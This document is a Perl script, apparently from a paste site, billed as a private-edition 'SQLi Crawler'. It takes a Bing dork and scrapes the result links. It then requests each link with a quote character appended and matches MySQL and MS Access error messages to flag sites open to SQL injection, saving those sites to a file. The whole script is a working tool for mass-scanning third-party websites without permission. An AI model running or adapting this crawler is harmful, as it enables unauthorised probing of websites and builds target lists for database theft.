Untitled

#!/usr/bin/perl

 

use strict;

use warnings;

use HTTP::Request;

use LWP::UserAgent;

 

###############

my $dork;

my $url;

my $i;

my $request;

my $useragent;

my $response;

my $start;

my $end;

my $result;

my $fl;

my $link;

my $req;

my $ua;

my $result2;

my $res;

my $save;

my $pages;

my $page;

my $choice;

##############

my @z;

 

print q{

     _ ____        _  

    | |  _ \      | |  

  __| | |_) | ___ | |_

 / _` |  _ < / _ \| __|

| (_| | |_) | (_) | |_

 \__,_|____/ \___/ \__|

                       

################################

##      / SQLi Crawler /      ##

##      Private Edition       ##

##      ~Coded by dbx~        ##

################################

 

};

 

MainMenu:

 

print "------------------------\n";

print "Enter [1] To Begin SQLi.\n";

print "Enter [2] To Exit.\n";

print "------------------------\n\n";

print "Your Choice: ";

 

chomp ($choice = <STDIN>);

print "\n";

 

if ($choice eq 1) {&sql_scan}

if ($choice eq 5) {die;}

 

sub sql_scan

{

 

print "[+] Enter Bing! dork: ";

chomp ($dork = <STDIN>);

print "\n";

print "[+] How Many Pages To Leech?: ";

chomp ($pages = <STDIN>);

print "\n";

 

$page = $pages.'1';

 

print "[~] Crawling...\n\n";

 

for ($i = 0; $i <= $page; $i=$i+11)

{

 

$url = "http://www.bing.com/search?q=$dork&go=&qs=n&sk=&sc=8-13&first=$i";

 

$request = HTTP::Request->new(GET => $url);

$useragent = LWP::UserAgent->new();

$response = $useragent->request($request);

$result = $response->content;

 

$start = '<h3><a href="';

$end = '" onmousedown=';

 

while ($result =~ m/$start(.*?)$end/g)

 

{

         $fl = $1;

         $link = $fl."%27";

         $req = HTTP::Request->new(GET => $link);

         $ua = LWP::UserAgent->new();

         $res = $ua->request($req);

         $result2 = $res->content;

 

          if ($result2=~ m/You have an error in your SQL syntax/i || $result2=~ m/Query failed/i || $result2=~ m/SQL query failed/i || $result2=~ m/mysql_fetch_/i || $result2=~ m/mysql_fetch_array/i || $result2 =~ m/mysql_num_rows/i || $result2 =~ m/The used SELECT statements have a different number of columns/i )

          {

                push @z, $link;

                print "[+] MySQL Vulnerable: $link\n\n";

          }

 

          elsif ($result2 =~ m/Microsoft JET Database/i || $result2 =~ m/ODBC Microsoft Access Driver/i )

          {

                push @z, $link;

                print "[+] MsSQL Vulnerable: $link\n\n";

          }

 

          else {

               

                        print "[-] $link <- Not Vulnerable\n\n";

          }

}

 

}

        print "Vulnerable Links:\n";

        print "-----------------------------------\n";

foreach (@z)

{

        print "$_ \n\n";

}

print "Save Into A Text File? (Y or N): ";

chomp ($save = <STDIN>);

 

if ($save eq 'Y')

{

        print "Saving File...\n\n";

        open(vuln_file, ">>Vulns.txt");

        foreach (@z)

        {

                print vuln_file "$_ \n";

        }

        close(vuln_file);

        print "File Saved!\n\n";

}

goto MainMenu;

}